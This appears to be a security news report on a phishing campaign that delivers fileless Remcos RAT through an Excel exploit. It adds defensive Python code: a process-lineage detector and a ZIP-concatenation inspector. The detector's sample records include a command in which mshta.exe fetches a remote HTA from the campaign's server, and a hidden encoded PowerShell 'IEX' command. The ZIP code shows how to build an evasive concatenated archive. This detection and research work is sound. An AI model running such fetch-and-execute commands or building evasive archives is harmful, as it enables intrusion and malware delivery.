Cybercriminals Spread Fileless Remcos RAT Malware via an Excel Exploit


Cybersecurity researchers have uncovered a new phishing campaign that delivers Remcos RAT, a fileless variant of the well-known commercial remote access tool.

Remcos RAT "provides purchasers with a wide range of advanced features to remotely control computers belonging to the buyer," Fortinet FortiGuard Labs researcher Xiaopeng Zhang wrote in a report released last week.

“However, threat actors have abused Remcos to collect sensitive information from victims and remotely control their computers to perform further malicious acts.”

The attack begins with a phishing email that uses purchase-order lures to entice the recipient into opening a Microsoft Excel attachment.

The malicious Excel document exploits a known remote code execution vulnerability in Office (CVE-2017-0199, CVSS score: 7.8) to download an HTML Application (HTA) file ("cookienetbookinetcahce.hta") from a remote server ("192.3.220[.]22") and launch it with mshta.exe.

To evade detection, the HTA file is wrapped in several layers of JavaScript, Visual Basic Script, and PowerShell code. Its main job is to fetch and run an executable from the same server.

That executable runs another obfuscated PowerShell program and employs a variety of anti-analysis and anti-debugging measures to make detection harder. The malicious code then uses process hollowing to download and execute Remcos RAT.

“Rather than saving the Remcos file into a local file and running it, it directly deploys Remcos in the current process’s memory,” Zhang said. “In other words, it is a fileless variant of Remcos.”
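The infection chain above leaves a distinctive process lineage on the endpoint: an Office application spawning a script host, which in turn spawns PowerShell with an encoded command. The following Python is an added illustration of a detection rule over that lineage; it is not code from Fortinet or from the report. It runs over a handful of constructed Sysmon-style process-creation records. The HTA filename and server IP are the article's indicators; the host paths, PIDs, the purchase-order filename and the encoded PowerShell argument are made up for the example, and the Office-application and script-host lists deliberately generalize beyond the Excel/mshta.exe pair described in the text.

```python
import base64
import re

# Process images treated as document readers and as script hosts. These lists
# generalize beyond the Excel -> mshta.exe pair in the article (an assumption
# for this example, not taken from the report).
OFFICE_APPS = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"mshta.exe", "powershell.exe", "pwsh.exe", "wscript.exe",
                "cscript.exe", "cmd.exe", "rundll32.exe", "regsvr32.exe"}
REMOTE_URL = re.compile(r"https?://\S+", re.IGNORECASE)
ENCODED_ARG = re.compile(r"(?:^|\s)-(?:encodedcommand|enc|en|ec|e)\s+([A-Za-z0-9+/=]+)",
                         re.IGNORECASE)

# Constructed Sysmon Event ID 1 style records, reduced to the fields the rule
# needs. The HTA name and server IP are the article's IOCs; paths, PIDs and the
# encoded PowerShell argument are made up for this example.
SAMPLE_EVENTS = [
    {"pid": 4120, "ppid": 812,
     "image": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "cmdline": r'"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE" "C:\Users\acct\Downloads\PO-1187.xlsx"'},
    {"pid": 4388, "ppid": 4120,
     "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": r'"C:\Windows\System32\mshta.exe" http://192.3.220.22/cookienetbookinetcahce.hta'},
    {"pid": 4402, "ppid": 4388,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -w hidden -ep bypass -enc SQBFAFgA"},
    # Benign controls: Excel opened from the shell with no children, and an
    # mshta.exe launched by Explorer against a local .hta file.
    {"pid": 5000, "ppid": 812,
     "image": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "cmdline": r'"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE"'},
    {"pid": 5100, "ppid": 812,
     "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": r'mshta.exe "C:\Program Files\Vendor\setup.hta"'},
]


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline: str):
    """Decode a PowerShell -EncodedCommand argument (base64 of UTF-16LE), or None."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def process_chain(by_pid: dict, pid: int) -> list:
    """Image names from the oldest ancestor present in the records down to `pid`."""
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        chain.append(basename(by_pid[pid]["image"]))
        pid = by_pid[pid]["ppid"]
    return chain[::-1]


def detect(events: list) -> list:
    """Flag script hosts descended from an Office process, and mshta.exe given a
    remote URL; record any remote URL and decoded -enc payload on the finding."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        image = basename(e["image"])
        if image not in SCRIPT_HOSTS:
            continue
        chain = process_chain(by_pid, e["pid"])
        url = REMOTE_URL.search(e["cmdline"])
        decoded = None
        if image in ("powershell.exe", "pwsh.exe"):
            decoded = decode_encoded_command(e["cmdline"])
        if any(a in OFFICE_APPS for a in chain[:-1]):
            rule, severity = "office_descendant_script_host", "high"
        elif image == "mshta.exe" and url:
            rule, severity = "mshta_remote_hta", "medium"
        else:
            continue
        findings.append({"rule": rule, "severity": severity, "pid": e["pid"],
                         "chain": chain, "remote_url": url.group(0) if url else None,
                         "decoded_command": decoded})
    return findings


if __name__ == "__main__":
    for finding in detect(SAMPLE_EVENTS):
        print(finding)
```

Run against the sample, the rule raises two high-severity findings, one for mshta.exe with the remote HTA URL and one for the PowerShell grandchild whose encoded argument decodes to "IEX", and stays silent on the two benign controls. In production the same logic would be fed from Sysmon or EDR telemetry rather than an inline list.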

Remcos RAT executes commands sent by the attacker through a command-and-control (C2) server and can collect a variety of data from the compromised host, including system metadata.

With the help of these commands, the program can harvest files, list and end processes, control system services, modify the Windows Registry, run commands and scripts, take screenshots, change the desktop wallpaper of a victim, activate the camera and microphone, download more payloads, record the screen, and even turn off keyboard and mouse input.

The disclosure follows Wallarm's revelation that threat actors are using Docusign APIs to send convincing fake invoices in an effort to trick unsuspecting users and run large-scale phishing campaigns.

The attackers first create a genuine, paid Docusign account, which lets them modify templates and use the API directly. The accounts are then used to generate specially crafted invoice templates that imitate e-signature requests from popular companies, such as Norton Antivirus.

“Unlike traditional phishing scams that rely on deceptively crafted emails and malicious links, these incidents use genuine DocuSign accounts and templates to impersonate reputable companies, catching users and security tools off guard,” the company said.

“If users e-sign this document, the attacker can use the signed document to request payment from the organization outside of DocuSign or send the signed document through DocuSign to the finance department for payment.”

Another unusual technique phishing campaigns use to get around security tools and deliver remote access trojans is ZIP file concatenation.

The technique appends several ZIP archives into a single file. This creates a security gap because different programs, such as 7-Zip, WinRAR, and Windows File Explorer, unpack and parse such files differently and may overlook the archive that carries the malicious payload.

“By exploiting the different ways ZIP readers and archive managers process concatenated ZIP files, attackers can embed malware that specifically targets users of certain tools,” Perception Point noted in a recent report.

“Threat actors know these tools will often miss or overlook the malicious content hidden within concatenated archives, allowing them to deliver their payload undetected and target users who use a specific program to work with archives.”
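The root of the disagreement between readers is how the ZIP format is located: the central directory is found through an end-of-central-directory (EOCD) record, so a reader that scans backwards from the end of the file sees only the trailing archive, while one that walks forward from the first local file header stops at the first EOCD and sees only the leading one. The following Python, added here as an illustration and not taken from Perception Point's report, builds a concatenated file from two constructed single-member archives, shows what each reading strategy returns, and includes a simple check a mail gateway or sandbox could apply before trusting a single listing. Python's zipfile is used for the backwards-scanning reader; the forward-walking reader is emulated by truncating at the first EOCD rather than by any specific product, and the member names and contents are made up.

```python
import io
import struct
import zipfile

EOCD_SIG = b"PK\x05\x06"   # end-of-central-directory record signature
EOCD_FIXED_LEN = 22        # fixed part of the EOCD; an archive comment may follow it


def build_archive(name: str, data: bytes) -> bytes:
    """Return the bytes of a single-member ZIP built in memory (constructed input)."""
    buf = io.BytesIO()
    # Stored (uncompressed) so the sample is deterministic and easy to inspect.
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_STORED) as zf:
        zf.writestr(name, data)
    return buf.getvalue()


def build_concatenated_sample() -> bytes:
    """Two complete archives glued back to back, as in the technique described above.
    Member names and contents are made up for this example."""
    leading = build_archive("notes.txt", b"quarterly figures attached\n")
    trailing = build_archive("payload.bin", b"marker bytes standing in for a payload\n")
    return leading + trailing


def eocd_records(blob: bytes) -> list:
    """Offsets of every EOCD signature in the blob. A single well-formed archive
    normally has exactly one (heuristic: the bytes could also occur inside data)."""
    offsets, start = [], 0
    while (i := blob.find(EOCD_SIG, start)) != -1:
        offsets.append(i)
        start = i + 1
    return offsets


def first_archive_end(blob: bytes) -> int:
    """Offset just past the first archive: its EOCD plus the comment length field."""
    eocd = eocd_records(blob)[0]
    (comment_len,) = struct.unpack_from("<H", blob, eocd + 20)
    return eocd + EOCD_FIXED_LEN + comment_len


def names_seen_by_trailing_parser(blob: bytes) -> list:
    """A reader that locates the EOCD by scanning backwards from EOF (as Python's
    zipfile does) lists only the last archive, even with data in front of it."""
    with zipfile.ZipFile(io.BytesIO(blob)) as zf:
        return zf.namelist()


def names_seen_by_leading_parser(blob: bytes) -> list:
    """A reader that walks forward from the first local header stops at the first
    EOCD and lists only the first archive; emulated here by truncation."""
    with zipfile.ZipFile(io.BytesIO(blob[:first_archive_end(blob)])) as zf:
        return zf.namelist()


def inspect(blob: bytes) -> dict:
    """Flag concatenation: more than one EOCD record, or bytes after the first archive."""
    eocds = eocd_records(blob)
    end = first_archive_end(blob)
    return {
        "eocd_count": len(eocds),
        "trailing_bytes": len(blob) - end,
        "concatenated": len(eocds) > 1 or end < len(blob),
    }


if __name__ == "__main__":
    sample = build_concatenated_sample()
    print("leading parser :", names_seen_by_leading_parser(sample))
    print("trailing parser:", names_seen_by_trailing_parser(sample))
    print("inspection     :", inspect(sample))
```

The practical takeaway is that a single tool's listing is not evidence of what the file contains: a scanner that only asks one parser will miss whichever half that parser discards. Treating any archive with trailing data after its first EOCD as suspicious, and extracting both halves for inspection, closes the gap regardless of which archive manager the recipient uses.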

The development also coincides with a threat actor tracked as Venture Wolf being linked to phishing attacks that use MetaStealer, a variant of the RedLine Stealer malware, against Russian IT, telecommunications, construction, and manufacturing companies.
